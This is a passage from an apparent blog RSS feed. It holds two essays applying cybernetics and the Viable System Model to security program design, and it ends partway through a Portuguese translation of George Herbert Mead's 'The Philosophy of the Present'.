needs to have teeth, often become too big for that same enforcement role to maintain visibility. Companies that haven&#39;t reached that level of maturity simply don&#39;t give &#34;policy enforcement&#34; the tools to actually &#34;enforce&#34; anything. &#34;Policy enforcement&#34; creates an adversarial relationship between security and operational units that makes everyone&#39;s job harder. By recognizing security as a support role, rather than an authority that demands obedience, we can focus on building the relationships we need to protect the organization that we all share.&#xA;&#xA;The economist Elinor Ostrom worked extensively on commons management, but the rules she developed are outside the scope of this work. That said, we will briefly touch on five rules for commons management will help simplify our work:&#xA;&#xA;Commons must have clearly defined boundaries.&#xA;Commons must be monitored.&#xA;Those who abuse the commons must be sanctioned.&#xA;Commons management must have authority.&#xA;Commons management works better when the specific commons exists within a larger commons framework.&#xA;&#xA;We have already touched on both the &#34;authority&#34; and &#34;abuse&#34; elements, though we&#39;ll need to come back to those later. In the next section we&#39;ll align all of these into a process that&#39;s driven by a new threat modeling methodology. This new methodology will pull from the information we established in the first section, and the program we build around it will revisit many of the concepts we&#39;ve introduced in this section.]]&gt;</description>
      <content:encoded><![CDATA[<p><em>This is the second entry in a series. If you haven&#39;t read <a href="https://infosec.press/security-through-the-looking-glass/cybernetic-security-invariants-identity-and-constraints" rel="nofollow">the previous one</a>, now might be a good time. If you&#39;re all caught up, then let&#39;s get into it.</em></p>

<p>Viable systems exist within an environment. They adapt to the environment, but they may also change the environment as they adapt and grow. Beavers evolved to build dams, and in doing so they changed the ecosystems in which they evolved. A successful company will change the market. A successful non-profit will change their domain. But even a stable company is only one entity within the environment. Other companies, NGOs, consumers, and the public sector all exist within this same environment. Regulations, technological advancement, and customer tastes all shift the environment.</p>

<p>Within this dynamic environment, what are you doing to track changes that impact your viability? How are you connecting environmental changes, such as regulation, to internal constraints, such as those that drive compliance enforcement and verification?</p>

<p>A security program will need to focus on a specific subset of this question. How do you monitor threat actors? The evolution of threat actors and their attack profiles must inform your risk model and prioritization. As defenses evolve, threat actors adapt and their attack patterns change. How do you collect data? How do you process it into intelligence that&#39;s actionable by people on your team?</p>

<p>Similarly, a security program will need a mechanism to track external changes to its attack surface in the form of supply chain risk management. What mechanisms do you have in place to track vulnerabilities in third party libraries, applications, and appliances that you use? How do you make sure that information (and specifically that information, not a flood of false positives) gets to people who can act on it?</p>

<p>We will come back to threat actors and vulnerability management in other articles.</p>

<p>Keeping track of you constraints as they evolve is only half of the constraint management equation. The other half is algedonic signaling. How do you know when constraints are violated?</p>

<p>In the body, an algedonic signal is a basic “pleasure or pain” signal, like those we started with. When your body is hungry, you feel it. When you get hungry enough, it hurts. The signal isn&#39;t detailed. It doesn&#39;t provide much information. It&#39;s simple and generally easy to investigate. Many signals, such as hunger, are intuitive. We learn to understand them immediately and without investigation.</p>

<p>All constraints should be tied to “algedonic” signals that trigger when they violated. But are they? If you&#39;ve recorded your constants (as described in the previous article) then you can perform a gap analysis.</p>

<p>For each constraint you have identified, write down the signals that fire when those constraints are violated. For any gaps you identify, and figure out a plan to close them. Are there constraints you have listed that you would feel comfortable not being alerted of in case they are violated? Those are not really constraints (at least not at your level) and they should be removed from your constraint list.</p>

<p>Anyone who has worked in tech long enough has seen some variation of alarm fatigue. Perhaps it has even been you who has had an email filtering rule that dumps alerts into a folder that is periodically cleared without any messages ever being read. Many security engineers will have had the experience of pointing to a vulnerability found by some automated scanner or other, a vulnerability which has since been then verified by a security engineer, and asking, “why was this been marked as a false positive?” Perhaps you&#39;ve observed to someone frantically clicking through a series of dire warnings, recognizing that the warnings intended to stop them have simply trained them to click fast without thinking. Too many signals can overwhelm a system. Notice that I&#39;m not specifying spurious signals. Accuracy is also a problem, but sheer volume of accurate signals can be enough.</p>

<p>Then what is the mechanism by which signals are reduced? Common frameworks can address common vulnerabilities. Many security programs will look for security violations: insecure software being used, vulnerabilities in software being developed, and so on. There are infinitely many ways to implement software insecurely. There may well be as many ways to implement software securely. Sorting between these sets requires tremendous knowledge and has a high probability of failure. By restricting the definition of “secure” as complying with a specific set of vetted patterns, software, hardware, configurations, and the like, the verification work is reduced.</p>

<p>Security Engineering can work on identifying common problems, addressing them with vetted patterns, and ensuring deployed patterns are updated as needed. This internal optimization work helps make the external signals around supply chain risk into something manageable. These restrictions are enforced not by complete refusal to use software, hardware, or configurations not explicitly allowed, but by adding friction, in terms of additional auditing or monitoring requirements, for teams trying to use them. Critical deviations will still be possible, at a cost, and most users will choose the path of least resistance.</p>

<p>Compliance work may revolve around understanding what regulations apply to software, what assets regulatory bodies need, and making sure those assets can be delivered. But it can be easy to miss that compliance can reduce regulatory risk through early intervention. By providing guidance that allows software to be designed in a way that avoids falling under regulation, or by concentrating regulatory risk in a smaller set of components, complexity, and the risk of signal overwhelm, can be reduced.</p>

<p>While cybernetics foregrounds the importance of complexity management, encapsulated as Ashby&#39;s Law of Requisite Variety, security program leadership can struggle to see the forest for the trees. In the frantic struggle to fight all the fires, it can be difficult to even notice the larger patterns. This is exactly where cybernetics can help us most.</p>

<p>The VSM defines a set of metasystemic subsystems that manage any system. In the first article we talked about the system itself as an entity surviving within and adapting to an environment. We connected that to the Identity subsystem, and how invariants inform constraints through identity.</p>

<p>In this article, thus far, we have talked more about that dynamic environment and how we need an Awareness subsystem to track environmental changes. We&#39;ve also talked about managing complexity through synergy using an Optimization subsystem. This leaves two more metasystemic components to cover: Internal Audit and Learning, and Harmonization. Before we talk about those, let&#39;s jump down the stack one more time. What are these subsystems learning about, auditing, and harmonizing? All of these metasystemic functions exist to support the Operational Units. Operational Units “do all the work that keeps the system alive.” In the body these are the muscles and organs that breath air, find food, digest food, and remove waste.</p>

<p>While the brain, the metasystem, directs the activity, it is the rest of the body that realizes that activity. It is important to keep this fact in mind as we try to understand the role of security in an organization. With this in mind, let&#39;s return to where we were.</p>

<p>The Optimization subsystem can passively coordinate optimization opportunities that are identified by subsystems, but it can also look actively collect data. Internal Audit and Learning is a subsystem of optimization that performs audits and looks for anomalies. Security folks may well be taking notice, recognizing some of our own work in this subsystem. But it&#39;s a little more complex than that. Let&#39;s talk about the Harmonization subsystem.</p>

<p>The function of the Harmonization subsystem is, essentially, to keep operating units from interfering with each other. If Operational Units are sharing compute resources, for example, Harmonization would include things like permissions and quotas. The VSM says that operational units should have maximal autonomy, but each Operational Unit must be prevented from threatening the viability of the system itself.</p>

<p>Now we, security, can really see ourselves in our familiar role with our familiar problem. Each operational unit may be trying to create a product, ship software or hardware, or to provide a service, but in doing so they can increase the attack surface. Promotion driven development may push team leads to compete to get software out faster and cheaper, incentivizing them to cut corners wherever they can. They ask if they can reduce the scope of a review, or push now and fix later. They may even push features that change the threat model but are, somehow, also “too minor for a security review.”</p>

<p>They each individually peruse their own objectives, and in doing so threaten the security of the organization as a whole. But when vulnerabilities are found, and perhaps even exploited, within a team&#39;s code the company as a whole bears the burden. Isn&#39;t it interesting that security tends to behave similarly to police, when, in actuality, our job is that of commons management.</p>

<p>Customer trust and internal funds are parts of the internal commons threatened by through a company&#39;s collective attack surface. The job of security is to coordinate teams across the company to ensure attack surface is minimized. Security works to protect customer trust from reputational threats, and funds from regulatory action and illegitimate compute usage.</p>

<p>Companies mature enough to understand that “policy enforcement” needs to have teeth, often become too big for that same enforcement role to maintain visibility. Companies that haven&#39;t reached that level of maturity simply don&#39;t give “policy enforcement” the tools to actually “enforce” anything. “Policy enforcement” creates an adversarial relationship between security and operational units that makes everyone&#39;s job harder. By recognizing security as a support role, rather than an authority that demands obedience, we can focus on building the relationships we need to protect the organization that we all share.</p>

<p>The economist Elinor Ostrom worked extensively on commons management, but the rules she developed are outside the scope of this work. That said, we will briefly touch on five rules for commons management will help simplify our work:</p>
<ol><li>Commons must have clearly defined boundaries.</li>
<li>Commons must be monitored.</li>
<li>Those who abuse the commons must be sanctioned.</li>
<li>Commons management must have authority.</li>
<li>Commons management works better when the specific commons exists within a larger commons framework.</li></ol>

<p>We have already touched on both the “authority” and “abuse” elements, though we&#39;ll need to come back to those later. In the next section we&#39;ll align all of these into a process that&#39;s driven by a new threat modeling methodology. This new methodology will pull from the information we established in the first section, and the program we build around it will revisit many of the concepts we&#39;ve introduced in this section.</p>
]]></content:encoded>
      <author>Security Through the Looking Glass</author>
      <guid>https://infosec.press/read/a/r48g2cshkc</guid>
      <pubDate>Sun, 31 May 2026 20:19:05 +0000</pubDate>
    </item>
    <item>
      <title> Cybernetic Security: Invariants, Identity, and Constraints</title>
      <link>https://infosec.press/security-through-the-looking-glass/cybernetic-security-invariants-identity-and-constraints</link>
      <description>&lt;![CDATA[If you are unable to get yourself food or water for a long enough period, you will die. We all know this. Our bodies tell us this with hunger and thirst. After a while we start to hurt, a headache or aching stomach. We will be compelled to do something about it, perhaps anything, to survive. You may even feel a bit of anxiety now even just thinking about it.&#xA;&#xA;Some people override these signals consciously. They fast for religious reasons. They go on hunger strikes to resist oppression in the only way they can, or raise awareness about a problem that isn&#39;t getting attention. What self-control, one might say, imagining Kafka&#39;s Hunger Artist sitting stoically in his cage as he wastes away. (I mean, no one would say that, but I&#39;m not going to miss such a good opportunity to throw in a Kafka reference.)&#xA;&#xA;Control, including both the signals the body sends to the mind and the ability of the mind to override them and dictate the body, is precisely the subject of the study of cybernetics. But cybernetics, of course, isn&#39;t specific to biological system. It abstracts concepts into models that can be applied to plants, animals, machines, social systems, and many other things. One such model is the Viable System Model (VSM).&#xA;&#xA;The VSM describes the abstract control components that a system needs in order to &#34;remain viable.&#34; The &#34;viable&#34; part of that is defined by a specific set of invariants. For biological things that means &#34;have enough water,&#34; &#34;have the right nutrients,&#34; &#34;have enough food,&#34; etc, while for businesses that generally means something like &#34;have employees&#34; and &#34;remain solvent.&#34;&#xA;&#xA;All viable systems exist within environments and viability can only be described within the context of these environments. Their existence within an environment necessarily changes that environment, and changes to the environment may influence their viability.&#xA;&#xA;The VSM, as a model, helps us think about the mechanisms which must exist, and the ways in which they must exist, within a system in order to maintain viability. Positively it tells us how to make a system viable or check that a system is viable. But that necessarily means it also happens to be useful for modeling.&#xA;&#xA;So let&#39;s take these concepts and begin to think about how we can leverage the power of cybernetics to design or improve a cybersecurity program. &#xA;&#xA;We need to start at the heart of the matter: viability. Whatever you&#39;re trying to protect either is a system that must remain viable, or exists within a system that must remain viable. Things that threaten that viability are called &#34;threats,&#34; where a &#34;security threat&#34; is a subset of those threats such that the threat may be intentionally realized by an actor. Now, by &#34;remain viable,&#34; we mean &#34;must maintain a set of invariants.&#34; &#xA;&#xA;A company, as we have discussed, needs (at least) employees to work and money to pay them (if no others). These are the minimal viability invariants of a company. A department within a company may have constraints, perhaps based on metric targets or goals: must maintain 10% customer growth, must achieve positive cash flow for product sales by the end of the year, etc. Subsystems, teams, subteams, individuals, software, will all derive their own constraints (explicitly or implicitly) from these root invariants.&#xA;&#xA;A system&#39;s invariants are enforced by the parent system (directly or through inheritance, say, from the laws of physics). Constraints are derived by the system or parent system in order to protect the system against violating the invariant within a specific environmental configuration. As the environment changes, constraints will also need to change; invariants must remain true as a property of the system across all possible environments. &#xA;&#xA;So then, what are those invariants for the highest level system for which you are responsible? List them.&#xA;&#xA;A system does specific things, generally in a specific way, in order to avoid violating these invariants. This defines the system identity. A store sells things within a specific market niche. A manufacturer makes stuff, from specific materials, with specific tools, for a specific market niche. I am a security engineer. I am writing about security. I may be able to pivot between security engineering work and technical writing, but if I try to be a baker tomorrow, and a landscaper next Tuesday, and a carpenter the following Friday, I will quite likely threaten my income. Without income, I will struggle to maintain the housing and food I need to maintain the constraints of temperature and caloric intake that keep me viable. As difficult as it would be for me, as an individual, to rapidly pivot, all the more-so for the shoe store to become a butcher or the cabinet factory to pivot to pharmaceuticals.&#xA;&#xA;Identity informs constraints. What then is the identity of the system for which you are responsible? Are you responsible for a subsystem, such as a department or team, where your identity is derived from a parent system? If yes, how so? Write these things down. &#xA;&#xA;What are the constraints that keep you from violating these invariants? List them.&#xA;&#xA;These constraints may be things like &#34;service and labor spend must be lower than customer provided income,&#34; &#34;services must comply with all applicable regulations to avoid fines,&#34; or &#34;the business must operate in a way consistent with the ethical framework of the community in order to retain employees and reduce retaliatory risk.&#34;&#xA;&#xA;Constraints will be derived from invariants, through various levels of system identity. If you are mapping constraints for a subsystem, you should be able to contextualize these constraints at least within the context of the next level of parent system above yours. A team should understand the department it&#39;s working it, a shop should understand regional goals.&#xA;&#xA;You have been asked to record other peaces of information, such as invariants, identity, and derived constraints. This specific information will be useful in the future. But while invariants won&#39;t change, and Identity should rarely or never change, constraints are a product of invariants interfacing with a dynamic environment through identity.&#xA;&#xA;This introduces us to the highest level cybernetic metasystemic function, and the dynamic environment within which a viable system must exist. This will set us up to talk in the next essay about the remaining metasystemic functions that allow our system to adapt to this dynamic environment, internally regulate, and manage complexity. In the third essay, we will revisit what you have written down here and use it to think differently about threat modeling.&#xA;&#xA;For many organizations today, threat modeling lies somewhere between theater and magical thinking. Design remains uninformed by threat models, and threat models become dead documents that are written once and thrown away. Assets that should be related to threat models, such as incident response plans, remain disconnected. What should be a tightly-knit living web of knowledge about the risk lifecycle of software becomes an archipelago of dead and disconnected data.&#xA;&#xA;This dead chaos breeds complexity, complexity that can be absorbed by a living knowledge system and a process that builds and leverages that knowledge. By putting the &#34;cyber&#34; back in cybersecurity, we will be able to build a security program that is actually able to consume the complexity we are experiencing today, and not choke. Keep your notes from this section. You will need them for the section on threat modeling. ]]&gt;</description>
      <content:encoded><![CDATA[<p>If you are unable to get yourself food or water for a long enough period, you will die. We all know this. Our bodies tell us this with hunger and thirst. After a while we start to hurt, a headache or aching stomach. We will be compelled to do something about it, perhaps anything, to survive. You may even feel a bit of anxiety now even just thinking about it.</p>

<p>Some people override these signals consciously. They fast for religious reasons. They go on hunger strikes to resist oppression in the only way they can, or raise awareness about a problem that isn&#39;t getting attention. What self-control, one might say, imagining Kafka&#39;s Hunger Artist sitting stoically in his cage as he wastes away. (I mean, no one would say that, but I&#39;m not going to miss such a good opportunity to throw in a Kafka reference.)</p>

<p>Control, including both the signals the body sends to the mind and the ability of the mind to override them and dictate the body, is precisely the subject of the study of cybernetics. But cybernetics, of course, isn&#39;t specific to biological system. It abstracts concepts into models that can be applied to plants, animals, machines, social systems, and many other things. One such model is the Viable System Model (VSM).</p>

<p>The VSM describes the abstract control components that a system needs in order to “remain viable.” The “viable” part of that is defined by a specific set of invariants. For biological things that means “have enough water,” “have the right nutrients,” “have enough food,” etc, while for businesses that generally means something like “have employees” and “remain solvent.”</p>

<p>All viable systems exist within environments and viability can only be described within the context of these environments. Their existence within an environment necessarily changes that environment, and changes to the environment may influence their viability.</p>

<p>The VSM, as a model, helps us think about the mechanisms which must exist, and the ways in which they must exist, within a system in order to maintain viability. Positively it tells us how to make a system viable or check that a system is viable. But that necessarily means it also happens to be useful for modeling.</p>

<p>So let&#39;s take these concepts and begin to think about how we can leverage the power of cybernetics to design or improve a cybersecurity program.</p>

<p>We need to start at the heart of the matter: viability. Whatever you&#39;re trying to protect either is a system that must remain viable, or exists within a system that must remain viable. Things that threaten that viability are called “threats,” where a “security threat” is a subset of those threats such that the threat may be intentionally realized by an actor. Now, by “remain viable,” we mean “must maintain a set of invariants.”</p>

<p>A company, as we have discussed, needs (at least) employees to work and money to pay them (if no others). These are the minimal viability invariants of a company. A department within a company may have constraints, perhaps based on metric targets or goals: must maintain 10% customer growth, must achieve positive cash flow for product sales by the end of the year, etc. Subsystems, teams, subteams, individuals, software, will all derive their own constraints (explicitly or implicitly) from these root invariants.</p>

<p>A system&#39;s invariants are enforced by the parent system (directly or through inheritance, say, from the laws of physics). Constraints are derived by the system or parent system in order to protect the system against violating the invariant within a specific environmental configuration. As the environment changes, constraints will also need to change; invariants must remain true as a property of the system across all possible environments.</p>

<p>So then, what are those invariants for the highest level system for which you are responsible? List them.</p>

<p>A system does specific things, generally in a specific way, in order to avoid violating these invariants. This defines the system identity. A store sells things within a specific market niche. A manufacturer makes stuff, from specific materials, with specific tools, for a specific market niche. I am a security engineer. I am writing about security. I may be able to pivot between security engineering work and technical writing, but if I try to be a baker tomorrow, and a landscaper next Tuesday, and a carpenter the following Friday, I will quite likely threaten my income. Without income, I will struggle to maintain the housing and food I need to maintain the constraints of temperature and caloric intake that keep me viable. As difficult as it would be for me, as an individual, to rapidly pivot, all the more-so for the shoe store to become a butcher or the cabinet factory to pivot to pharmaceuticals.</p>

<p>Identity informs constraints. What then is the identity of the system for which you are responsible? Are you responsible for a subsystem, such as a department or team, where your identity is derived from a parent system? If yes, how so? Write these things down.</p>

<p>What are the constraints that keep you from violating these invariants? List them.</p>

<p>These constraints may be things like “service and labor spend must be lower than customer provided income,” “services must comply with all applicable regulations to avoid fines,” or “the business must operate in a way consistent with the ethical framework of the community in order to retain employees and reduce retaliatory risk.”</p>

<p>Constraints will be derived from invariants, through various levels of system identity. If you are mapping constraints for a subsystem, you should be able to contextualize these constraints at least within the context of the next level of parent system above yours. A team should understand the department it&#39;s working it, a shop should understand regional goals.</p>

<p>You have been asked to record other peaces of information, such as invariants, identity, and derived constraints. This specific information will be useful in the future. But while invariants won&#39;t change, and Identity should rarely or never change, constraints are a product of invariants interfacing with a dynamic environment through identity.</p>

<p>This introduces us to the highest level cybernetic metasystemic function, and the dynamic environment within which a viable system must exist. This will set us up to talk in the next essay about the remaining metasystemic functions that allow our system to adapt to this dynamic environment, internally regulate, and manage complexity. In the third essay, we will revisit what you have written down here and use it to think differently about threat modeling.</p>

<p>For many organizations today, threat modeling lies somewhere between theater and magical thinking. Design remains uninformed by threat models, and threat models become dead documents that are written once and thrown away. Assets that should be related to threat models, such as incident response plans, remain disconnected. What should be a tightly-knit living web of knowledge about the risk lifecycle of software becomes an archipelago of dead and disconnected data.</p>

<p>This dead chaos breeds complexity, complexity that can be absorbed by a living knowledge system and a process that builds and leverages that knowledge. By putting the “cyber” back in cybersecurity, we will be able to build a security program that is actually able to consume the complexity we are experiencing today, and not choke. Keep your notes from this section. You will need them for the section on threat modeling.</p>
]]></content:encoded>
      <author>Security Through the Looking Glass</author>
      <guid>https://infosec.press/read/a/y53mzoufx2</guid>
      <pubDate>Sat, 30 May 2026 12:59:11 +0000</pubDate>
    </item>
    <item>
      <title>﻿O Presente como o Locus da Realidade</title>
      <link>https://infosec.press/nomos/o-presente-como-o-locus-da-realidade</link>
      <description>&lt;![CDATA[Por George Herbert Mead em A Filosofia do Presente (EUA, 1932)&#xA;!--more--&#xA;&#xA;O tema desta conferência encontra-se na proposição de que a realidade existe em um presente. O presente, naturalmente, implica um passado e um futuro, e negamos existência a ambos. A sugestão de Whitehead de que, à medida que os presentes especiosos variam em extensão temporal, pode-se conceber um único presente capaz de abranger toda a realidade temporal, aparentemente nos deixaria a passagem, mas eliminaria o passado e o futuro. Seja o que mais fosse, isso não seria um presente, pois aquilo de que ele tivesse passado não teria deixado de existir, e aquilo que está por existir já estaria nesse presente inclusivo. Poder-se-ia duvidar se isso ainda preservaria o caráter da passagem, mas, em todo caso, a natureza essencial do presente e da existência teria desaparecido. Pois o que caracteriza um presente é o seu tornar-se e o seu desaparecer. Enquanto o clarão do meteoro atravessa nossos próprios presentes especiosos, ele está inteiramente ali, ainda que apenas por uma fração de minuto. Estender essa fração de minuto a todo o processo do qual ela é um fragmento, conferindo-lhe a mesma solidariedade de existência que o clarão possui na experiência, seria apagar sua natureza como evento. Tal conspecto da existência não seria um presente eterno, pois não seria um presente de modo algum. Tampouco seria uma existência. Pois uma realidade parmenidiana não existe. A existência envolve a não-existência; ela efetivamente ocorre. O mundo é um mundo de eventos.&#xA;&#xA;Há pouco propósito ou proveito em estabelecer antinomias e derrubar uma por meio da outra, ou em relegar a permanência a um mundo subsistente e atemporal enquanto o evento, no qual nada existe além de passagem, é transformado no elemento substancial das coisas existentes. O caráter permanente que nos interessa é aquele que permanece na existência, e diante do qual a mudança também existe. Há, isto é, o passado que se expressa na irrevogabilidade, embora jamais tenha existido na experiência um passado que não tenha mudado com o passar das gerações. Os passados nos quais estamos envolvidos são ao mesmo tempo irrevogáveis e revogáveis. É inútil, ao menos para os propósitos da experiência, recorrer a um passado “real” dentro do qual fazemos descobertas constantes; pois esse passado deve ser contraposto a um presente no qual o emergente aparece, e o passado, que então precisa ser considerado do ponto de vista do emergente, torna-se um passado diferente. O emergente, quando aparece, é sempre encontrado como decorrente do passado, mas antes de aparecer ele não decorre do passado, por definição. É inútil insistir em caracteres universais ou eternos pelos quais eventos passados possam ser identificados independentemente de qualquer emergente, pois estes ou estão além de nossa formulação ou tornam-se tão vazios que não servem a nenhum propósito de identificação. A importância do infinito no pensamento matemático antigo e moderno ilustra essa impotência.&#xA;&#xA;Permanece a possibilidade de empurrar toda a realidade efetiva para um mundo de eventos em um espaço-tempo minkowskiano que transcende nossos referenciais, e os caracteres dos eventos para um mundo de entidades subsistentes. Até que ponto tal concepção da realidade pode ser logicamente elaborada eu não pretenderei discutir. O que me parece interessante é o significado que um conceito como o de irrevogabilidade possui na experiência.&#xA;&#xA;Não gastarei tempo nem retórica apresentando o quadro em movimento das histórias que sucederam umas às outras desde os mitos das eras primitivas até o relato de Eddington ou Jeans sobre “O Universo ao Nosso Redor”. Interessa apenas notar que a rapidez com que esses passados se sucedem aumentou continuamente com o aumento da exatidão crítica no estudo do passado. Há uma ausência completa de finalidade em tais apresentações. É, naturalmente, implicação de nosso método de pesquisa que o historiador, em qualquer campo da ciência, será capaz de reconstruir o que aconteceu como um relato autenticado do passado. Contudo, aguardamos com vivo interesse a reconstrução, no mundo que será, do mundo que foi, pois percebemos que o mundo que será não pode diferir do mundo que é sem reescrever o passado para o qual agora olhamos retrospectivamente.&#xA;&#xA;E, no entanto, o caráter de irrevogabilidade jamais se perde. Aquilo que aconteceu foi além de qualquer possibilidade de recuperação e, seja o que tenha sido, seu deslizar para o passado parece colocá-lo além da influência de eventos emergentes em nossa própria conduta ou na natureza. É o “o que ele foi” que muda, e esse título aparentemente vazio de irrevogabilidade liga-se a ele, venha ele a tornar-se o que for. A importância de ser irrevogável liga-se ao “o que ele foi”, e o “o que ele foi” é precisamente aquilo que não é irrevogável. Há uma finalidade que acompanha o desaparecimento de cada evento. A toda descrição desse evento essa finalidade é acrescentada, mas toda a importância dessa finalidade pertence ao mesmo mundo da experiência ao qual essa descrição pertence.&#xA;&#xA;Ora, contraposta a essa incidência evidente de finalidade em um presente está a suposição habitual de que o passado que nos determina está lá. A verdade é que o passado está lá, em sua certeza ou probabilidade, no mesmo sentido em que o enquadramento de nossos problemas está lá. Parto da suposição de que a cognição, e o pensamento como parte do processo cognitivo, é reconstrutiva, porque a reconstrução é essencial para a conduta de um ser inteligente no universo. Isso é apenas parte da proposição mais geral de que mudanças estão ocorrendo no universo e de que, como consequência dessas mudanças, o universo está se tornando um universo diferente. A inteligência é apenas um aspecto dessa mudança. Trata-se de uma mudança que é parte de um processo vivo contínuo que tende a manter-se. O que é peculiar à inteligência é que ela constitui uma mudança que envolve uma reorganização mútua, um ajuste no organismo e uma reconstituição do ambiente; pois, em seus termos mais elementares, qualquer mudança no organismo acarreta uma diferença de sensibilidade e de resposta, e uma diferença correspondente no ambiente. É dentro desse processo que surge a chamada inteligência consciente, pois a consciência é tanto a diferença que surge no ambiente em razão de sua relação com o organismo em seu processo orgânico de ajustamento quanto a diferença no organismo em razão da mudança que ocorreu no ambiente. Referimo-nos à primeira como significado, e à segunda como ideação. O reflexo do organismo no ambiente e o reflexo do ambiente no organismo são fases essenciais na manutenção do processo vital que constitui a inteligência consciente.&#xA;&#xA;Considerarei o significado da consciência em uma conferência posterior. No momento, meu interesse é apenas localizar aquela atividade à qual a cognição pertence e da qual o pensamento é uma expressão. Estou distinguindo, em particular, aquela existência do mundo para o organismo individual e social que corresponde ao uso mais geral do termo consciência daquela situação que corresponde ao termo “consciência de”. É esta última que, a meu ver, conota cognição. A distinção entre ambas coincide com aquela que sugeri entre o problema e o seu contexto.&#xA;&#xA;O contexto dentro do qual ocorre o ajustamento é essencial para esse ajustamento e se insere naquilo que pertence ao “campo da consciência”, tal como esse termo é geralmente utilizado — especialmente quando reconhecemos as implicações daquilo que está mais definidamente no campo da consciência. O termo “campo da percepção” às vezes é usado no mesmo sentido, mas é mais propenso a carregar consigo o valor de “percepção de” do que o termo “consciência”. Em outras palavras, no conhecimento há sempre a pressuposição de um mundo que está aí e que fornece a base para o processo inferencial e ideacional da cognição. Isso, naturalmente, restringe a cognição ou a “consciência de” àquilo que contém em si uma dimensão inferencial.&#xA;&#xA;Ora, o mundo que está aí em sua relação com o organismo, e que estabelece as condições para o ajustamento do organismo e a consequente mudança nesse mundo e desse mundo, inclui o seu passado. Abordamos toda questão de caráter histórico com um certo aparato, que pode ser cuidadosamente definido, e esse material mais tecnicamente definido — documentos, testemunhos orais e vestígios históricos — sustenta um dado passado que se estende retroativamente a partir das memórias de ontem e de hoje, e que não colocamos em dúvida. Utilizamos esse aparato para responder hipoteticamente às questões históricas que nos pressionam e para testar nossas hipóteses quando estas foram elaboradas.&#xA;&#xA;Compreende-se, naturalmente, que qualquer parte desse aparato e do passado no qual ele está inserido pode ela própria tornar-se objeto de dúvida, mas mesmo o ceticismo mais radical, em sua própria formulação, não consegue escapar da memória das palavras e ideias que formulam a doutrina cética.&#xA;Algum passado dado desse tipo está implicado nas questões referentes ao passado. E esse passado dado amplia o presente especioso. É verdade que o acordo último entre os significados de dois documentos pode residir na experiência de um presente especioso, mas apenas sob a suposição da comparação que anteriormente fizemos entre os documentos. Essa comparação se estende para trás de nós e permanece inquestionada até que alguém aponte nela um erro e assim a coloque em questão, mas então apenas com base no passado dele próprio e de outros.&#xA;&#xA;Tomemos a engenhosa sugestão — creio que do pai de Gosse — de que Deus criou o mundo com seus fósseis e outras evidências de um passado remoto para pôr à prova a fé dos homens; e atualizemos a sugestão para meia hora atrás. Suponhamos que o mundo tenha vindo à existência, com sua estrutura presente exata, incluindo os chamados conteúdos de nossas mentes, há trinta minutos, e que tivéssemos alguma evidência ulterior, análoga às concepções fundamentalistas do Sr. Gosse, de que isso tivesse ocorrido. Poderíamos examinar a hipótese apenas à luz de algum passado que estivesse aí, por mais reduzido que ele tivesse se tornado. E esse passado se estende indefinidamente, pois nada o interrompe, uma vez que qualquer momento dele, sendo representado, possui o seu próprio passado, e assim sucessivamente.&#xA;&#xA;O que queremos dizer, então, com a afirmação de que existiu algum passado real com todos os seus eventos, independentemente de qualquer presente, cujos conteúdos estamos lenta e imperfeitamente decifrando? Retornamos, naturalmente, às próprias correções que fazemos em nossa pesquisa histórica e ao grau mais elevado de evidência daquilo que foi descoberto em comparação com o que podia ser oferecido pela descrição descartada. Graus mais altos de probabilidade e evidências adicionais implicam que há ou houve alguma realidade ali que estamos trazendo à luz.&#xA;&#xA;Há, portanto, uma referência palpável ao passado inquestionado por meio de cuja evidência investigamos e solucionamos os problemas que surgem. E o próprio fato a que me referi — o de que qualquer descrição aceita do passado, embora não esteja agora em questão, pode concebivelmente vir a ser posta em dúvida — parece implicar algum passado inquestionável que serviria de pano de fundo para a solução de todos os problemas concebíveis. Admitamos isso provisoriamente e façamos a pergunta ulterior: esse passado independente de qualquer presente entra de fato em nossas investigações — quero dizer, como uma pressuposição que desempenha algum papel em nosso pensamento? Se retirássemos essa pressuposição, nosso aparato e sua operação na pesquisa histórica seriam afetados de algum modo?&#xA;&#xA;Certamente não, se nos ocuparmos apenas dos problemas com os quais os historiadores da história social ou científica se ocupam. Aqui a referência é sempre e exclusivamente ao passado dado do qual surgiu um problema; e os contornos do problema e os testes aos quais as hipóteses apresentadas são submetidas encontram-se nesse passado dado. Como vimos, esse passado dado pode ele próprio, em uma data posterior, ser afetado pela dúvida e trazido à discussão. E, no entanto, a possível dubiedade do passado dado não afeta de maneira alguma a empreitada. Esta é outra maneira de dizer que a dubiedade de todos os passados possíveis jamais entra no pensamento do historiador.&#xA;&#xA;A única aproximação a tal entrada é a exigência de que todos os passados anteriores sejam explicados e incorporados à formulação mais recente. E cada passado anterior, na medida em que é reconstruído, é nessa mesma medida mostrado como incorreto. Nas implicações de nosso método parecemos aproximar-nos de uma formulação-limite, ainda que no infinito, que preencheria todas as lacunas e corrigiria todos os erros. Mas, se estamos fazendo correções, deve aparentemente existir alguma descrição que seja correta; e mesmo se contemplarmos um futuro indefinido de pesquisa científica empenhada nessa tarefa, jamais escapamos dessa implicação.&#xA;&#xA;Há outra maneira de dizer isso: nosso trabalho de pesquisa é um trabalho de descoberta, e só podemos descobrir aquilo que está lá, quer o descubramos ou não. Penso, contudo, que esta última afirmação está errada, se se supõe que implica haver ou ter havido um passado independente de todos os presentes, pois pode haver — e sem dúvida há — em qualquer presente com seu próprio passado uma vasta quantidade de coisas que não descobrimos, e, ainda assim, aquilo que descobrimos ou deixamos de descobrir assumirá um significado diferente e terá uma estrutura diferente como evento quando visto de algum ponto de vista posterior.&#xA;&#xA;Há erro semelhante na concepção da correção do erro passado e na sugestão de que ela implica o absolutamente correto, ainda que jamais o alcance? Refiro-me à correção “em si” de uma descrição de eventos, implícita em uma correção feita por um historiador posterior. Penso que a correção absoluta que se encontra no pensamento do historiador seria a apresentação completa do passado dado, se todas as suas implicações fossem desenvolvidas. Se pudéssemos conhecer tudo o que está implicado em nossas memórias, documentos e monumentos, e fôssemos capazes de controlar todo esse conhecimento, o historiador suporia possuir aquilo que é absolutamente correto.&#xA;&#xA;Mas um historiador do tempo de Aristóteles, ampliando dessa maneira seu passado conhecido, teria alcançado um passado correto que estaria em total desacordo com o mundo conhecido da ciência moderna; e há apenas diferenças de grau entre tal comparação e aquelas que as mudanças devidas à pesquisa vêm produzindo em nossos passados ano após ano. Se estamos nos referindo a qualquer outra correção “em si”, ela deve ser ou a de uma realidade que, por definição, jamais poderia entrar em nossa experiência, ou a de uma meta no infinito na qual cessa o tipo de experiência em que nos encontramos.&#xA;&#xA;É, naturalmente, possível supor que a experiência dentro 